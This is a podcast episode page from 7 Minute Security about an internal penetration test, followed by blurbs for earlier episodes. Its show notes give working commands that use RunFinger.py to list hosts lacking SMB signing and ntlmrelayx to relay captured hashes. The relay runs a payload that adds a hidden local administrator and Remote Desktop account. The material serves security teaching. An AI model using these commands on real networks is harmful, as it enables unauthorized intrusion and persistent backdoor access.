7MS #372: Tales of Internal Pentest Pwnage - Part 5
7 Minute Security15 Juli 2019

7MS #372: Tales of Internal Pentest Pwnage - Part 5

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute

Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode:

  • Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:
opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt

Source: Pwning internal networks automagically

  • Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget:
net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add

So the full command would be:

ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add'

Check today's show notes at https://7ms.us for more information!

Avsnitt(719)

7MS #342: Interview with Matt McCullough

7MS #342: Interview with Matt McCullough

Matt McCullough (a.k.a. Matty McFly on Slack) joined me in the studio to talk about his wild and crazy path to security. He started literally with no technical experience, but through a lot of hard wo...

27 Dec 20181h 45min

7MS #341: How to Fix Unquoted Service Paths

7MS #341: How to Fix Unquoted Service Paths

Today's episode is brought to you by my friends at safepass.me. Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised passw...

19 Dec 201816min

7MS #340: Forensics 101 Reloaded and The CryptoLocker Music Video

7MS #340: Forensics 101 Reloaded and The CryptoLocker Music Video

Last week I had the fun privilege of speaking twice at the Minnesota Goverment IT Symposium on the following topics: Forensics 101: This was a "reloaded" talk that I started earlier this year (and c...

13 Dec 201822min

7MS #339: A Pulse-Pounding Impromptu Physical Pentest

7MS #339: A Pulse-Pounding Impromptu Physical Pentest

On a recent security assessment I was thrown for a loop and given the opportunity to do a two-part physical pentest/SE exercise - with about 5 minutes notice(!). Yes, it had me pooping my pants, but i...

6 Dec 201819min

7MS #338: SIEMple Tests for Your SIEM Solution

7MS #338: SIEMple Tests for Your SIEM Solution

Today's episode talks about some SIEMple tests you can run on your SIEM (OMg see what I did there? I took the word simple and made it SIEMple. Genius stuff, right? And there's no extra charge for it!)...

28 Nov 201817min

7MS #337: Happy Secure Thanksgiving

7MS #337: Happy Secure Thanksgiving

Happy Thanksgiving! In this episode I: Share some things I'm thankful for - like you! Talk about a fun episode I'm working on that has some SIEMple tests you can use to test your SIEM (omg see what I...

21 Nov 201827min

7MS #336: How to Succeed in Business Without Really Crying - Part 6

7MS #336: How to Succeed in Business Without Really Crying - Part 6

Welcome to part 6 of our miniseries all about the ups, downs, trials and tribulations of being a small, one-person security start up. In this episode I detail out all the software/services I use to ru...

14 Nov 201823min

7MS #335: Cool Stuff I Just Learned From Red Teamers

7MS #335: Cool Stuff I Just Learned From Red Teamers

Today I'm excited to brain-dump a bunch of cool stuff I learned at a red team conference called ArcticCon this week. Although this conference observes the Chatham house rule I'm just going to talk abo...

8 Nov 201813min

Populärt inom Politik & nyheter

aftonbladet-krim
rss-krimstad
svenska-fall
p3-krim
spar
aftonbladet-daily
flashback-forever
politiken
rss-sanning-konsekvens
rss-krimreportrarna
motiv
rss-vad-fan-hande
blenda-2
rss-flodet
rss-frandfors-horna
rss-expressen-dok
grans
rss-aftonbladet-krim
svd-ledarredaktionen
ett-rent-noje